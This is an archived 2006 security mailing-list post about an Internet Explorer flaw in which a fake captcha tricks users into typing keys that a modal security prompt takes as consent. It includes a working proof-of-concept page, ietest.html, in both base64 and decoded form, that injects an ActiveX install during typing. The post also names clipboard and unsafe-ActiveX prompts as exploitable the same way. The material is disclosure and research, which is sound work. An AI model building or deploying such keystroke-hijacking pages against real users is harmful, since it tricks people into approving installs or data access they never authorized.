ietest.html.txt

2006-04-28T00:00:00
ID PACKETSTORM:45803
Type packetstorm
Reporter Matthew Murphy
Modified 2006-04-28T00:00:00

Description

                                        
                                            `This is a multi-part message in MIME format.  
--------------010404020600030408080408  
Content-Type: text/plain; charset=UTF-8  
Content-Transfer-Encoding: 7bit  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: RIPEMD160  
  
Dear Lists:  
  
Apparently I wasn't clear enough with this paragraph of my advisory, or  
a sizeable portion of the list readership elected to ignore it:  
  
"A malicious user could create content that would request the user to  
click an object or press a sequence of keys. By delivering a security  
prompt during this process, the site could subvert the prompting and  
obtain permission for actions that were not necessarily authorized."  
  
It seemed fairly clear to me, but apparently it sounded better to me  
than it did to some readers. :-(  
  
Basically, the scenario for the vulnerability is as follows:  
  
* Ask for user input that is predictable (mouse clicks, text string with  
the letter 'y', etc.)  
  
* Display a modal security prompt that will "eat" that input and treat  
it as a "Permit" answer to the security prompt.  
  
The result: compromise of security, potentially including arbitrary code  
execution.  
  
A particular scenario was identified that involved the exploitation of  
the modal ActiveX prompt delivered by some systems. The user is asked  
to type a certain string of characters (ala captcha). A prompt will be  
displayed (hopefully during the time the user is typing the string) to  
install the Microsoft Surround Video Control.  
  
If you're still typing the "captcha" when the prompt appears, you'll  
install the control. This works as advertised against all systems  
EXCEPT Windows XP SP2 and Windows Server 2003 SP1. If the software you  
install hoses your box, just remember that it's signed by Microsoft. In  
other words... don't look at me.  
  
Other prompts on XP SP2 and 2003 SP1 are exploitable for various gains  
as well. Virtually any prompt that wasn't commonly displayed on a web  
page prior to these updates is still handled via the (risky) modal  
dialog model. One example is the "Allow Paste Operations via Script"  
prompt that is displayed when a web page attempts to access the  
clipboard. Another example is "Initialize and Script ActiveX controls  
not marked as safe" prompt, which is somewhat mitigated by LMZ lockdown.  
  
All of those cases are exploitable in the same way as this one -- you  
simply have to change the "unsafe" action. Rather than having a page  
generate an ActiveX install, for instance, you could have it try to  
sniff the clipboard, initiate install-on-demand, or some other suspect  
action. The ability to cause the action to be approved silently is  
achieved the same way -- having a user unwittingly enter a 'Y' to the  
prompt.  
  
As you might notice, the exploit vector is virtually identical to that  
of MS05-054. I'm beginning to wonder if maybe it isn't the triviality  
of the remaining issues making them hard for people to envision. After  
all, Jesse Ruderman provides all of the theory and Secunia even  
demonstrates it for us with the file download dialog exploit code. The  
follow-up attack to such precise, detailed research is not a terribly  
creative one -- it merely involves piecing together what somebody else  
missed, ignored or didn't research to its full depth. This is a really  
easy class of attack to eliminate completely when compared to other more  
insidious attack vectors, and I expect that this process will eventually  
happen.  
  
Note that the standard disclaimer (that your use of this is at your own  
risk) still applies. Perhaps more so this time, because there's  
Microsoft code coming down along with the exploit. Not to say that my  
code is less buggy than Microsoft's (at least, not if I wrote a few  
billion lines of it) rather that it's third-party software and may be  
subject to unforeseen security risks, incompatibilities or other  
maladies (ala COM Object Instantiation or MS06-015).  
  
- --  
"Social Darwinism: Try to make something idiot-proof,  
nature will provide you with a better idiot."  
  
-- Michael Holstein  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.2 (MingW32)  
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB5444D38  
  
iD8DBQFEULsifp4vUrVETTgRA+22AKCl1mkmE5EVB2R+Nv+H64VynQccmQCcCPMx  
oGy6Mz4Lcoj7ZyPhQ+LEB2I=  
=+LbS  
-----END PGP SIGNATURE-----  
  
--------------010404020600030408080408  
Content-Type: text/html;  
name="ietest.html"  
Content-Transfer-Encoding: base64  
Content-Disposition: inline;  
filename="ietest.html"  
  
PEhUTUw+DQo8SEVBRD4NCjxUSVRMRT5JbnRlcm5ldCBFeHBsb3JlciBBY3RpdmVYIEluc3Rh  
bGxhdGlvbiBWdWxuZXJhYmlsaXR5PC9USVRMRT4NCjwvSEVBRD4NCjxCT0RZIEJHQ09MT1I9  
IiNGRkZGRkYiIFRFWFQ9IiMwMDAwMDAiPg0KPFNDUklQVD4NCg0KZnVuY3Rpb24gZG9JbnN0  
YWxsQ29udHJvbCgpIHsNCg0KCWRvY3VtZW50LmJvZHkuaW5uZXJIVE1MICs9DQoJCSI8T0JK  
RUNUIENMQVNTSUQ9XCJjbHNpZDo5Mjg2MjZBMy02Qjk4LTExQ0YtOTBCNC0wMEFBMDBBNDAx  
MUZcIiBUWVBFPVwiYXBwbGljYXRpb24veC1vbGVvYmplY3RcIiBDT0RFQkFTRT1cImh0dHA6  
Ly9hY3RpdmV4Lm1pY3Jvc29mdC5jb20vYWN0aXZleC9jb250cm9scy9tdXNldW0vTVNTdXJW  
aWQuY2FiI1ZlcnNpb249MSwyLDAsN1wiIFdJRFRIPVwiMzI1XCIgSEVJR0hUPVwiMjUwXCI+  
XHJcbiIgKw0KICAgICAgICAgICAgCSI8UEFSQU0gTkFNRT1cIlN1cnJvdW5kUmVjdFwiIFZB  
TFVFPVwiMCwwLDMyNSwyNTBcIj5cclxuIiArDQogICAgICAgICAgICAJIjxQQVJBTSBOQU1F  
PVwiSW1hZ2VcIiBWQUxVRT1cInJpdGV0cmVlLmpwZ1wiPlxyXG4iICsNCiAgICAgICAgICAJ  
IjwvT0JKRUNUPiI7DQoNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY2FwdGNoYSIpLmZv  
Y3VzKCk7DQp9DQoNCmZ1bmN0aW9uIGRvV2FpdEVudHJ5KCkgew0KDQoJaWYgKGV2ZW50Lmtl  
eUNvZGUgPT0gNzggfHwgZXZlbnQua2V5Q29kZSA9PSAxMTApIHsNCgkJZG9JbnN0YWxsQ29u  
dHJvbCgpOw0KCX0NCg0KfQ0KDQo8L1NDUklQVD4NCg0KPEZPUk0gQUNUSU9OPSIiIE1FVEhP  
RD0iR0VUIj4NClBsZWFzZSBlbnRlciB0aGUgdGV4dCB5b3Ugc2VlIG9uIHRoZSBsZWZ0OjxC  
Uj48QlI+DQoNCjxCPm9uM2wxeTZ5OHk1eTwvQj4gPElOUFVUIFRZUEU9InRleHQiIElEPSJj  
YXB0Y2hhIiBPTktFWVBSRVNTPSJkb1dhaXRFbnRyeSgpIj4NCjwvRk9STT4NCg0KPC9CT0RZ  
Pg0KPC9IVE1MPg==  
--------------010404020600030408080408  
Content-Type: text/plain;  
name="ietest.html.asc"  
Content-Transfer-Encoding: base64  
Content-Disposition: inline;  
filename="ietest.html.asc"  
  
LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0NClZlcnNpb246IEdudVBHIHYxLjQuMiAo  
TWluZ1czMikNCg0KaUQ4REJRQkVVTENvZnA0dlVyVkVUVGdSQWkvU0FLQ2liZnpVZFJaSWJ6  
QXgrUzlNU1BUbWdYbXk2QUNlTlNTdg0KUTUwYzU1VEplTlhWck5nUlhLaHZ2N2M9DQo9ZUoz  
MA0KLS0tLS1FTkQgUEdQIFNJR05BVFVSRS0tLS0tDQo=  
--------------010404020600030408080408--  
<HTML>  
<HEAD>  
<TITLE>Internet Explorer ActiveX Installation Vulnerability</TITLE>  
</HEAD>  
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">  
<SCRIPT>  
  
function doInstallControl() {  
  
document.body.innerHTML +=  
"<OBJECT CLASSID=\"clsid:928626A3-6B98-11CF-90B4-00AA00A4011F\" TYPE=\"application/x-oleobject\" CODEBASE=\"http://activex.microsoft.com/activex/controls/museum/MSSurVid.cab#Version=1,2,0,7\" WIDTH=\"325\" HEIGHT=\"250\">\r\n" +  
"<PARAM NAME=\"SurroundRect\" VALUE=\"0,0,325,250\">\r\n" +  
"<PARAM NAME=\"Image\" VALUE=\"ritetree.jpg\">\r\n" +  
"</OBJECT>";  
  
document.getElementById("captcha").focus();  
}  
  
function doWaitEntry() {  
  
if (event.keyCode == 78 || event.keyCode == 110) {  
doInstallControl();  
}  
  
}  
  
</SCRIPT>  
  
<FORM ACTION="" METHOD="GET">  
Please enter the text you see on the left:<BR><BR>  
  
<B>on3l1y6y8y5y</B> <INPUT TYPE="text" ID="captcha" ONKEYPRESS="doWaitEntry()">  
</FORM>  
  
</BODY>  
</HTML>`